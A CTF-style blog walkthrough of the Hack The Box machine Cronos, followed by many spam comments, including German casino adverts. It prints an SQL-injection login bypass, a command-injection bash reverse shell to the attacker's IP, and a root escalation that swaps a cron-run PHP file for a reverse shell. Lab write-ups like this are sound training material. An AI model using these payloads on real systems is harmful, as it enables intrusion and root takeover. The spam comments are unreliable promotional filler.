Cronos

Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.

As always, we start with an all port nmap scan: nmap -p – 10.10.10.13

Pretty standard, so let’s see if we can determine versions and see if we have any scripts available: nmap -p 22,53,80 -sC -sV 10.10.10.13

So we have a website running Apache, let’s bring up Firefox and check it out.

Let’s see if we can do some enumeration with Dirbuster: gobuster dir -u http://10.10.10.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

After letting that run for a bit nothing exciting came up:

Now let’s try some DNS Enumeration: host -l cronos.htb 10.10.10.13

Excellent, there’s two sub domains: admin.cronos.htb and www.cronos.htb. Let’s update our /etc/hosts file with this information.

Once we save that file we can bring up our web browser and navigate to http://admin.cronos.htb and we see that we get a login page.

I initially tried several SQL injection payloads here at first. One finally worked: ‘or’1’=’1’;– – and I put it in both the username and password field. This page is a great starting point for different SQL injection payloads: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#authentication-bypass

So playing with this it looks like it’s a tool for code execution. You sometimes see these in web pages for tech products like firewalls and stuff.

Let’s try running something else, like ls; ls -la

The fact that we can stack commands with a ; is awesome (though bad for the user). We can utilize this to get a shell on our target: ; /bin/bash -c “/bin/bash -i >& /dev/tcp/10.10.14.18/8080 0>&1”

So once we setup our NetCat listener and then run the shell above…we should have a shell

Enumeration – LinEnum.sh

We’re going to Enumerate with LinEnum.sh, which we can get from here: https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

We’ll use WGET to download it: wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

And then we’ll use the Python SimpleHTTPServer to transfer it over to our target machine:

And then we’ll execute it with bash LinEnum.sh -t

There’s a lot to go through here, but one thing that’s always worth looking at is the Crontabs (hint due to the box name?).

We see that we have a cronjob at the bottom run every minute of every day as root (last line in the cron jobs). It looks like the path is /var/www/laravel/artisan

Let’s start by catting this file: cat /var/www/laravel/artisan

So it looks like the file that’s used for the cron job is a php file. This should make it easy for us to use the php reverse shell from PenTest Monkey: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Let’s download this to our Kali box and then update it with our Kali machine IP and port we’re going to listen on:

Now, since we already have our SimpleHTTPServer up, we should be able to just wget it: wget php-reverse-shell.php

Move the file to the /var/www/laravel/artisan directory (and thus overwriting the current one): mv php-reverse-shell.php /var/www/laravel/artisan

Quickly setup your NetCat listener, and wait:

A quick whoami reveals root, and you can navigate to /root to get the root flat.

281 thoughts on “Cronos”

  1. In the awesome design of things you’ll secure an A for hard work. Where you confused everybody ended up being in all the details. As it is said, details make or break the argument.. And it could not be much more correct right here. Having said that, allow me say to you what exactly did deliver the results. Your text can be really convincing and this is probably why I am taking an effort to comment. I do not make it a regular habit of doing that. 2nd, while I can notice a jumps in reasoning you come up with, I am definitely not sure of how you seem to unite your points which make the final result. For right now I shall yield to your issue however wish in the future you actually connect your facts much better.

  2. Heya i am for the first time here. I found this board and I find It truly useful & it helped me out a lot. I hope to give something back and aid others like you aided me.

  3. Currently it sounds like Drupal is the preferred blogging platform out there right now. (from what I’ve read) Is that what you’re using on your blog?

  4. Hi, i feel that i noticed you visited my website thus i got here to “go back the want”.I am trying to to find issues to improve my web site!I guess its adequate to make use of some of your ideas!!

  5. Hmm is anyone else having problems with the images on this blog loading? I’m trying to figure out if its a problem on my end or if it’s the blog. Any feed-back would be greatly appreciated.

  6. Hi! Someone in my Myspace group shared this site with us so I came to look it over. I’m definitely enjoying the information. I’m book-marking and will be tweeting this to my followers! Excellent blog and terrific design and style.

  7. Its such as you learn my mind! You seem to know so much about this, such as you wrote the book in it or something. I feel that you could do with a few to pressure the message house a bit, however instead of that, this is magnificent blog. A fantastic read. I’ll certainly be back.

  8. Nice read, I just passed this onto a friend who was doing some research on that. And he just bought me lunch since I found it for him smile So let me rephrase that: Thank you for lunch!

  9. hey there and thank you for your info – I have certainly picked up anything new from right here. I did however expertise some technical points using this website, as I experienced to reload the website many times previous to I could get it to load correctly. I had been wondering if your web host is OK? Not that I am complaining, but slow loading instances times will sometimes affect your placement in google and can damage your high quality score if advertising and marketing with Adwords. Anyway I’m adding this RSS to my email and could look out for a lot more of your respective intriguing content. Ensure that you update this again soon..

  10. Write more, thats all I have to say. Literally, it seems as though you relied on the video to make your point. You obviously know what youre talking about, why waste your intelligence on just posting videos to your blog when you could be giving us something enlightening to read?

  11. I’m still learning from you, while I’m trying to achieve my goals. I certainly love reading everything that is written on your blog.Keep the tips coming. I enjoyed it!

  12. Diese Events bieten sowohl wettbewerbsorientierte als auch zufallsbasierte Gewinnmöglichkeiten, die den Nervenkitzel erhöhen und ein starkes
    Gemeinschaftsgefühl unter den Spielern fördern. Vegadream steigert das Online-Spielerlebnis durch spannende Turniere und Gewinnspiele in Form von Lotterien, die
    für zusätzliche Spannung sorgen. Wir nutzen modernste Verschlüsselungstechnologien, um Ihre
    persönlichen und finanziellen Daten zu schützen und bieten Ihnen eine
    Reihe von Werkzeugen, um die Kontrolle über Ihr Spielverhalten zu
    behalten.
    Trotzdem haben immer mehr Online-Casinos einiges in Sachen Spielerlebnis
    zu bieten und bauen eine erstklassige Atmosphäre
    auf. 28 dieser Casinos befinden sich direkt auf dem berühmten Las Vegas Strip, der für das bekannte Bild der erleuchteten Stadt
    zum Großteil verantwortlich ist. In der alten Innenstadt von Las Vegas ist die
    Fremont Street eine reine Fußgängerzone mit allen möglichen einzigartigen Sehenswürdigkeiten.

    References:
    https://online-spielhallen.de/kingmaker-casino-test-spiele-boni-auszahlungen/

  13. Suchen Sie in Deutschland nach zuverlässigen Partnern, um verifizierte Codes zu erhalten. Um Sonderangebote auf der Princess Casino-Plattform zu
    erhalten, müssen Sie bei der Anmeldung oder Einzahlung normalerweise einen eindeutigen Code eingeben. Dieser proaktive Ansatz
    stellt sicher, dass Sie problemlos an etwaige Gewinne gelangen können.
    Das Double-Chance-Feature bietet dir eine erhöhte Gewinnchance für einen Aufschlag von 25% des jeweiligen Einsatzes.
    Der Kundensupport steht ebenfalls jederzeit bereit,
    um Probleme zu lösen.. Ich habe einmal ein wöchentliches Einzahlungslimit gesetzt, um mein Spielverhalten besser zu kontrollieren. Princess Casino bietet Funktionen wie Einzahlungslimits und Selbstsperren. Egal
    ob ich mit Visa, Skrill oder Neteller einzahle, mein Guthaben ist innerhalb weniger Sekunden auf meinem Spielerkonto.
    Gelegentlich bietet Princess Casino solche Aktionen an. Ich habe als VIP-Mitglied schnellere Auszahlungen erhalten.

    References:
    https://online-spielhallen.de/beste-paysafecard-casinos-2025-schnell-sicher/

  14. Hi, Neat post. There’s a problem with your web site in internet explorer, would check this… IE still is the market leader and a huge portion of people will miss your excellent writing because of this problem.

  15. Great work! This is the type of information that should be shared around the web. Shame on the search engines for not positioning this post higher! Come on over and visit my site . Thanks =)

  16. Have you ever thought about writing an ebook or guest authoring on other blogs? I have a blog based upon on the same ideas you discuss and would love to have you share some stories/information. I know my viewers would appreciate your work. If you are even remotely interested, feel free to send me an e-mail.

  17. I needed to send you that little remark so as to thank you so much again for your personal nice concepts you have documented in this article. This has been surprisingly open-handed of people like you to offer unhampered what exactly most people could possibly have offered for an e-book to get some dough for their own end, even more so given that you might have tried it in the event you desired. These tips in addition acted to be a easy way to understand that someone else have similar dream just like my own to realize good deal more with reference to this condition. I am sure there are many more pleasurable opportunities in the future for individuals that find out your website.

  18. I got what you intend, thankyou for putting up.Woh I am pleased to find this website through google.

  19. You are my aspiration, I possess few blogs and infrequently run out from to post .

  20. I absolutely love your blog and find nearly all of your post’s to be just what I’m looking for. Does one offer guest writers to write content in your case? I wouldn’t mind producing a post or elaborating on some of the subjects you write about here. Again, awesome blog!

  21. **gl pro**

    GL Pro is a natural dietary supplement formulated to help maintain steady, healthy blood sugar levels while easing persistent sugar cravings.

  22. I’d have to examine with you here. Which is not one thing I usually do! I take pleasure in reading a post that may make folks think. Additionally, thanks for permitting me to comment!

  23. I like what you guys are up too. Such intelligent work and reporting! Keep up the excellent works guys I have incorporated you guys to my blogroll. I think it’ll improve the value of my website :).

  24. Your article masterfully demonstrates that sustainable growth requires balancing visionary goals with practical, grounded steps, and I deeply appreciate how you weave these complementary elements throughout your actionable, insightful, and reader-centered guidance.

  25. I really like your blog.. very nice colors & theme. Did you create this website yourself or did you hire someone to do it for you? Plz respond as I’m looking to construct my own blog and would like to find out where u got this from. cheers

  26. Your style is really unique compared to other people I’ve read stuff from. I appreciate you for posting when you have the opportunity, Guess I’ll just book mark this blog.

  27. Hey there, You have performed an incredible job. I will definitely digg it and in my view recommend to my friends. I’m confident they’ll be benefited from this website.

  28. At this time it sounds like Drupal is the preferred blogging platform out there right now. (from what I’ve read) Is that what you are using on your blog?

  29. Simply wish to say your article is as surprising. The clarity in your post is just nice and i can assume you are an expert on this subject. Well with your permission allow me to grab your feed to keep updated with forthcoming post. Thanks a million and please continue the enjoyable work.

  30. Simply want to say your article is as surprising. The clearness in your post is simply nice and i can assume you are an expert on this subject. Well with your permission let me to grab your feed to keep up to date with forthcoming post. Thanks a million and please continue the enjoyable work.

  31. The other day, while I was at work, my sister stole my iPad and tested to see if it can survive a 25 foot drop, just so she can be a youtube sensation. My iPad is now broken and she has 83 views. I know this is completely off topic but I had to share it with someone!

  32. May I just say what a comfort to find somebody who actually knows what they’re discussing online. You definitely realize how to bring a problem to light and make it important. More and more people need to check this out and understand this side of your story. I was surprised you’re not more popular given that you definitely have the gift.

  33. Can I simply say what a comfort to find somebody who genuinely understands what they’re discussing on the net. You definitely know how to bring a problem to light and make it important. More people have to read this and understand this side of the story. I was surprised that you aren’t more popular given that you surely have the gift.

  34. Can I just say what a relief to find someone who really understands what they’re talking about on the net. You actually realize how to bring an issue to light and make it important. More people ought to read this and understand this side of the story. I can’t believe you aren’t more popular since you most certainly possess the gift.

  35. Wow that was unusual. I just wrote an really long comment but after I clicked submit my comment didn’t appear. Grrrr… well I’m not writing all that over again. Anyhow, just wanted to say excellent blog!

  36. Can I simply just say what a relief to find somebody who really knows what they’re talking about over the internet. You actually understand how to bring a problem to light and make it important. More and more people must read this and understand this side of the story. It’s surprising you’re not more popular since you certainly possess the gift.

  37. Wow that was strange. I just wrote an incredibly long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyway, just wanted to say excellent blog!

  38. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  39. Hey there, You have done an excellent job. I will certainly digg it and individually recommend to my friends. I am confident they’ll be benefited from this web site.

  40. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  41. Can I simply say what a relief to discover an individual who really understands what they are discussing on the internet. You certainly know how to bring a problem to light and make it important. More people really need to read this and understand this side of the story. I can’t believe you aren’t more popular given that you most certainly possess the gift.

  42. May I just say what a relief to uncover somebody that actually understands what they’re talking about on the internet. You actually understand how to bring a problem to light and make it important. More and more people must look at this and understand this side of your story. I can’t believe you aren’t more popular because you definitely possess the gift.

  43. Wow that was strange. I just wrote an extremely long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyways, just wanted to say wonderful blog!

  44. Wow that was odd. I just wrote an extremely long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyhow, just wanted to say great blog!

  45. Hey there, You’ve done a fantastic job. I will certainly digg it and in my opinion recommend to my friends. I am sure they will be benefited from this website.

  46. Hello there, You’ve done an excellent job. I’ll certainly digg it and individually recommend to my friends. I am confident they’ll be benefited from this website.

  47. Hello there, You’ve done an excellent job. I will certainly digg it and in my opinion recommend to my friends. I’m sure they will be benefited from this site.

  48. At this time it appears like WordPress is the best blogging platform available right now. (from what I’ve read) Is that what you are using on your blog?

  49. Right now it looks like Expression Engine is the preferred blogging platform available right now. (from what I’ve read) Is that what you’re using on your blog?

  50. Currently it appears like WordPress is the best blogging platform out there right now. (from what I’ve read) Is that what you’re using on your blog?

  51. Aw, this was an extremely good post. Spending some time and actual effort to produce a top notch article… but what can I say… I hesitate a whole lot and don’t seem to get anything done.

  52. Currently it appears like Drupal is the top blogging platform available right now. (from what I’ve read) Is that what you’re using on your blog?

  53. Currently it sounds like WordPress is the preferred blogging platform out there right now. (from what I’ve read) Is that what you are using on your blog?

  54. Hey there, You’ve done a great job. I’ll definitely digg it and individually recommend to my friends. I am confident they’ll be benefited from this website.

  55. I used to be very happy to search out this web-site.I wished to thanks in your time for this excellent learn!! I positively enjoying each little little bit of it and I’ve you bookmarked to take a look at new stuff you blog post.

  56. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  57. Aw, this was a really good post. Spending some time and actual effort to produce a good article… but what can I say… I hesitate a whole lot and never seem to get anything done.

  58. Hi there, You have done a fantastic job. I’ll definitely digg it and personally suggest to my friends. I am confident they will be benefited from this website.

  59. Does your website have a contact page? I’m having trouble locating it but, I’d like to send you an e-mail. I’ve got some ideas for your blog you might be interested in hearing. Either way, great site and I look forward to seeing it grow over time.

  60. What’s Taking place i am new to this, I stumbled upon this I have found It positively helpful and it has aided me out loads. I’m hoping to contribute & aid other customers like its helped me. Good job.

  61. Right now it sounds like Expression Engine is the preferred blogging platform out there right now. (from what I’ve read) Is that what you are using on your blog?

  62. Hey just wanted to give you a quick heads up. The text in your content seem to be running off the screen in Internet explorer. I’m not sure if this is a format issue or something to do with browser compatibility but I thought I’d post to let you know. The design look great though! Hope you get the issue solved soon. Kudos

  63. Wow that was odd. I just wrote an extremely long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Regardless, just wanted to say excellent blog!

  64. May I simply say what a relief to discover someone who truly knows what they are discussing on the internet. You actually understand how to bring an issue to light and make it important. More and more people need to check this out and understand this side of the story. I was surprised that you’re not more popular because you certainly possess the gift.

  65. Tremendous issues here. I am very happy to see your article. Thanks a lot and I am looking ahead to contact you. Will you kindly drop me a e-mail?

  66. Aw, this was an exceptionally good post. Finding the time and actual effort to produce a really good article… but what can I say… I put things off a whole lot and never manage to get nearly anything done.

  67. Currently it appears like BlogEngine is the preferred blogging platform available right now. (from what I’ve read) Is that what you are using on your blog?

  68. Wow that was unusual. I just wrote an really long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyways, just wanted to say superb blog!

  69. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  70. Hi! I’m at work surfing around your blog from my new apple iphone! Just wanted to say I love reading through your blog and look forward to all your posts! Keep up the great work!

  71. Hello there, You have performed an incredible job. I’ll certainly digg it and in my view suggest to my friends. I’m sure they’ll be benefited from this website.

  72. Wow that was unusual. I just wrote an incredibly long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyways, just wanted to say great blog!

  73. Aw, this was a very good post. Finding the time and actual effort to generate a very good article… but what can I say… I put things off a lot and don’t manage to get anything done.

  74. Wow that was odd. I just wrote an incredibly long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyway, just wanted to say wonderful blog!

  75. Can I just say what a relief to find someone who genuinely knows what they are discussing on the web. You actually know how to bring an issue to light and make it important. A lot more people need to look at this and understand this side of your story. It’s surprising you are not more popular since you surely possess the gift.

  76. Aw, this was a very good post. Finding the time and actual effort to produce a very good article… but what can I say… I put things off a whole lot and don’t seem to get nearly anything done.

  77. Currently it looks like Drupal is the preferred blogging platform out there right now. (from what I’ve read) Is that what you are using on your blog?

  78. May I simply say what a relief to discover someone who genuinely understands what they are discussing on the web. You definitely realize how to bring a problem to light and make it important. More and more people need to read this and understand this side of your story. It’s surprising you are not more popular because you certainly have the gift.

  79. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  80. Aw, this was an exceptionally nice post. Finding the time and actual effort to create a top notch article… but what can I say… I hesitate a lot and never seem to get anything done.

  81. Aw, this was an extremely good post. Finding the time and actual effort to make a really good article… but what can I say… I hesitate a lot and don’t seem to get anything done.

  82. Hi! I know this is kinda off topic however I’d figured I’d ask. Would you be interested in exchanging links or maybe guest authoring a blog article or vice-versa? My website discusses a lot of the same subjects as yours and I think we could greatly benefit from each other. If you’re interested feel free to send me an email. I look forward to hearing from you! Superb blog by the way!

  83. Wow that was strange. I just wrote an very long comment but after I clicked submit my comment didn’t appear. Grrrr… well I’m not writing all that over again. Anyways, just wanted to say wonderful blog!

  84. Can I simply say what a relief to find someone who truly understands what they are talking about over the internet. You definitely realize how to bring an issue to light and make it important. More people must look at this and understand this side of the story. I was surprised that you aren’t more popular because you surely possess the gift.

  85. Wow that was strange. I just wrote an incredibly long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyway, just wanted to say superb blog!

  86. Have you ever considered about adding a little bit more than just your articles? I mean, what you say is important and everything. Nevertheless think of if you added some great graphics or videos to give your posts more, “pop”! Your content is excellent but with pics and video clips, this website could undeniably be one of the greatest in its niche. Fantastic blog!

  87. Wow that was unusual. I just wrote an incredibly long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyhow, just wanted to say great blog!

  88. Wonderful blog! I found it while surfing around on Yahoo News. Do you have any suggestions on how to get listed in Yahoo News? I’ve been trying for a while but I never seem to get there! Thank you

  89. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  90. May I just say what a comfort to discover a person that truly knows what they’re discussing over the internet. You actually realize how to bring a problem to light and make it important. More and more people should read this and understand this side of the story. I can’t believe you aren’t more popular given that you certainly have the gift.

  91. Currently it looks like Drupal is the top blogging platform out there right now. (from what I’ve read) Is that what you’re using on your blog?

  92. May I simply just say what a comfort to find someone who really knows what they are talking about on the net. You actually understand how to bring a problem to light and make it important. A lot more people really need to check this out and understand this side of your story. I was surprised that you’re not more popular since you definitely possess the gift.

  93. At this time it seems like Movable Type is the best blogging platform available right now. (from what I’ve read) Is that what you are using on your blog?

  94. Aw, this was an incredibly nice post. Taking a few minutes and actual effort to create a great article… but what can I say… I hesitate a lot and never seem to get nearly anything done.

  95. Right now it appears like WordPress is the preferred blogging platform available right now. (from what I’ve read) Is that what you’re using on your blog?

  96. Simply wish to say your article is as astounding. The clearness for your post is just excellent and i can suppose you are knowledgeable on this subject. Fine together with your permission let me to seize your feed to keep updated with impending post. Thanks a million and please carry on the enjoyable work.

  97. Hello there, You’ve done an excellent job. I’ll definitely digg it and for my part recommend to my friends. I’m confident they’ll be benefited from this site.

  98. Wow that was strange. I just wrote an extremely long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyways, just wanted to say superb blog!

  99. Aw, this was an exceptionally good post. Taking a few minutes and actual effort to make a great article… but what can I say… I hesitate a lot and never manage to get anything done.

  100. Currently it looks like Movable Type is the best blogging platform out there right now. (from what I’ve read) Is that what you are using on your blog?

  101. Aw, this was an incredibly good post. Taking a few minutes and actual effort to generate a superb article… but what can I say… I put things off a whole lot and never seem to get anything done.

  102. Currently it looks like Movable Type is the top blogging platform out there right now. (from what I’ve read) Is that what you’re using on your blog?

  103. Currently it looks like Drupal is the top blogging platform out there right now. (from what I’ve read) Is that what you are using on your blog?

  104. Can I simply say what a comfort to find someone that really knows what they are talking about on the internet. You certainly know how to bring a problem to light and make it important. More and more people need to check this out and understand this side of your story. I can’t believe you’re not more popular because you surely have the gift.

  105. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  106. Right now it sounds like Expression Engine is the top blogging platform out there right now. (from what I’ve read) Is that what you are using on your blog?

  107. Hey there, You’ve done a great job. I will certainly digg it and for my part recommend to my friends. I am sure they will be benefited from this website.

  108. Right now it appears like Drupal is the top blogging platform out there right now. (from what I’ve read) Is that what you’re using on your blog?

  109. Hello there, You have performed a great job. I will definitely digg it and individually recommend to my friends. I am sure they will be benefited from this site.

  110. Hi there, You’ve performed a fantastic job. I’ll certainly digg it and personally suggest to my friends. I am sure they will be benefited from this site.

  111. Wow that was strange. I just wrote an incredibly long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyway, just wanted to say excellent blog!

  112. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  113. At this time it seems like Drupal is the preferred blogging platform out there right now. (from what I’ve read) Is that what you are using on your blog?

  114. Hey there, You’ve done a great job. I will definitely digg it and in my opinion recommend to my friends. I am sure they will be benefited from this website.

  115. May I simply say what a comfort to find somebody who genuinely knows what they’re talking about online. You certainly know how to bring a problem to light and make it important. More and more people should check this out and understand this side of the story. It’s surprising you’re not more popular because you certainly have the gift.

  116. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  117. Wow that was unusual. I just wrote an extremely long comment but after I clicked submit my comment didn’t appear. Grrrr… well I’m not writing all that over again. Anyhow, just wanted to say wonderful blog!

  118. Can I just say what a relief to discover an individual who really understands what they’re discussing online. You definitely realize how to bring an issue to light and make it important. More people have to look at this and understand this side of your story. I was surprised that you’re not more popular since you definitely possess the gift.

  119. Aw, this was a very good post. Taking a few minutes and actual effort to create a very good article… but what can I say… I put things off a lot and don’t manage to get nearly anything done.

  120. At this time it appears like WordPress is the top blogging platform out there right now. (from what I’ve read) Is that what you’re using on your blog?

  121. Wow that was strange. I just wrote an incredibly long comment but after I clicked submit my comment didn’t appear. Grrrr… well I’m not writing all that over again. Anyhow, just wanted to say wonderful blog!

  122. Hello there, You have performed a great job. I’ll definitely digg it and individually recommend to my friends. I’m confident they’ll be benefited from this web site.

  123. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  124. May I simply just say what a relief to uncover somebody that actually knows what they are discussing online. You definitely realize how to bring a problem to light and make it important. A lot more people should look at this and understand this side of the story. I was surprised that you aren’t more popular given that you certainly have the gift.

  125. Hello there I am so thrilled I found your website, I really found you by error, while I was searching on Yahoo for something else, Anyways I am here now and would just like to say thanks a lot for a marvelous post and a all round exciting blog (I also love the theme/design), I don’t have time to browse it all at the minute but I have bookmarked it and also added your RSS feeds, so when I have time I will be back to read much more, Please do keep up the superb work.

  126. Hello! Do you know if they make any plugins to safeguard against hackers? I’m kinda paranoid about losing everything I’ve worked hard on. Any recommendations?

  127. Heya i am for the first time here. I found this board and I find It truly useful & it helped me out a lot. I hope to give something back and help others like you aided me.

  128. Hello! Quick question that’s entirely off topic. Do you know how to make your site mobile friendly? My website looks weird when browsing from my iphone. I’m trying to find a theme or plugin that might be able to resolve this problem. If you have any recommendations, please share. Thanks!

  129. Does your site have a contact page? I’m having trouble locating it but, I’d like to send you an e-mail. I’ve got some suggestions for your blog you might be interested in hearing. Either way, great website and I look forward to seeing it grow over time.

  130. At this time it seems like WordPress is the top blogging platform out there right now. (from what I’ve read) Is that what you’re using on your blog?

  131. Aw, this was an extremely nice post. Taking the time and actual effort to produce a good article… but what can I say… I procrastinate a whole lot and never seem to get nearly anything done.

  132. Wow that was unusual. I just wrote an extremely long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Anyhow, just wanted to say wonderful blog!

  133. Can I simply say what a relief to find someone that really knows what they’re discussing on the web. You actually realize how to bring an issue to light and make it important. More people need to check this out and understand this side of the story. I was surprised that you aren’t more popular because you certainly have the gift.

  134. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  135. It’s not my first time to visit this web site, i am visiting this website dailly and take good facts from here everyday.

  136. Pretty section of content. I just stumbled upon your site and in accession capital to assert that I get actually enjoyed account your blog posts. Any way I’ll be subscribing to your feeds and even I achievement you access consistently quickly.

  137. Hey there just wanted to give you a brief heads up and let you know a few of the images aren’t loading correctly. I’m not sure why but I think its a linking issue. I’ve tried it in two different browsers and both show the same results.

  138. May I simply say what a relief to find an individual who actually knows what they are talking about over the internet. You actually realize how to bring a problem to light and make it important. More people should read this and understand this side of your story. I can’t believe you’re not more popular since you definitely have the gift.

  139. Can I just say what a comfort to uncover a person that genuinely knows what they are talking about on the web. You actually understand how to bring a problem to light and make it important. More and more people should check this out and understand this side of your story. It’s surprising you aren’t more popular since you most certainly have the gift.

  140. Hello there, You have done an incredible job. I’ll definitely digg it and in my opinion recommend to my friends. I am sure they’ll be benefited from this web site.

  141. Currently it sounds like WordPress is the preferred blogging platform available right now. (from what I’ve read) Is that what you’re using on your blog?

  142. Heya i am for the first time here. I found this board and I find It really useful & it helped me out much. I hope to give something back and help others like you aided me.

  143. Hi there, You have performed a great job. I will definitely digg it and in my opinion suggest to my friends. I am confident they’ll be benefited from this website.

  144. Wow that was odd. I just wrote an very long comment but after I clicked submit my comment didn’t appear. Grrrr… well I’m not writing all that over again. Anyways, just wanted to say excellent blog!

  145. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  146. At this time it seems like Expression Engine is the preferred blogging platform out there right now. (from what I’ve read) Is that what you’re using on your blog?

  147. Can I just say what a relief to discover someone who really knows what they are discussing over the internet. You definitely understand how to bring a problem to light and make it important. More and more people need to read this and understand this side of the story. I was surprised you aren’t more popular because you certainly possess the gift.

  148. of course like your website however you need to take a look at the spelling on several of your posts. Many of them are rife with spelling problems and I in finding it very bothersome to tell the truth on the other hand I will certainly come again again.

  149. Hi there, You have performed a great job. I’ll definitely digg it and personally suggest to my friends. I am sure they’ll be benefited from this website.

  150. Aw, this was an exceptionally good post. Taking the time and actual effort to make a really good article… but what can I say… I procrastinate a whole lot and never manage to get nearly anything done.

  151. Wow that was strange. I just wrote an very long comment but after I clicked submit my comment didn’t appear. Grrrr… well I’m not writing all that over again. Regardless, just wanted to say great blog!

  152. Can I simply say what a relief to discover an individual who really knows what they’re talking about on the internet. You certainly understand how to bring an issue to light and make it important. More people really need to check this out and understand this side of the story. It’s surprising you are not more popular because you surely have the gift.

  153. Currently it seems like Expression Engine is the preferred blogging platform out there right now. (from what I’ve read) Is that what you are using on your blog?

  154. Currently it appears like WordPress is the preferred blogging platform available right now. (from what I’ve read) Is that what you are using on your blog?

  155. Hello there, You’ve performed a great job. I’ll definitely digg it and personally recommend to my friends. I’m confident they will be benefited from this web site.

  156. At this time it seems like Drupal is the top blogging platform out there right now. (from what I’ve read) Is that what you are using on your blog?

  157. Can I simply say what a relief to find somebody who genuinely knows what they are discussing on the internet. You certainly realize how to bring an issue to light and make it important. A lot more people need to read this and understand this side of your story. I can’t believe you aren’t more popular given that you certainly possess the gift.

  158. Currently it looks like Expression Engine is the preferred blogging platform out there right now. (from what I’ve read) Is that what you are using on your blog?

  159. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  160. Aw, this was an incredibly nice post. Finding the time and actual effort to generate a really good article… but what can I say… I procrastinate a whole lot and never seem to get anything done.

  161. Aw, this was an exceptionally good post. Spending some time and actual effort to produce a top notch article… but what can I say… I procrastinate a lot and don’t manage to get nearly anything done.

  162. Aw, this was an incredibly nice post. Taking the time and actual effort to produce a very good article… but what can I say… I hesitate a whole lot and never manage to get anything done.

  163. At this time it seems like BlogEngine is the top blogging platform out there right now. (from what I’ve read) Is that what you are using on your blog?

  164. Hey I know this is off topic but I was wondering if you knew of any widgets I could add to my blog that automatically tweet my newest twitter updates. I’ve been looking for a plug-in like this for quite some time and was hoping maybe you would have some experience with something like this. Please let me know if you run into anything. I truly enjoy reading your blog and I look forward to your new updates.

  165. Wow that was unusual. I just wrote an very long comment but after I clicked submit my comment didn’t show up. Grrrr… well I’m not writing all that over again. Regardless, just wanted to say excellent blog!

  166. Aw, this was a really good post. Taking the time and actual effort to make a very good article… but what can I say… I put things off a lot and don’t manage to get anything done.

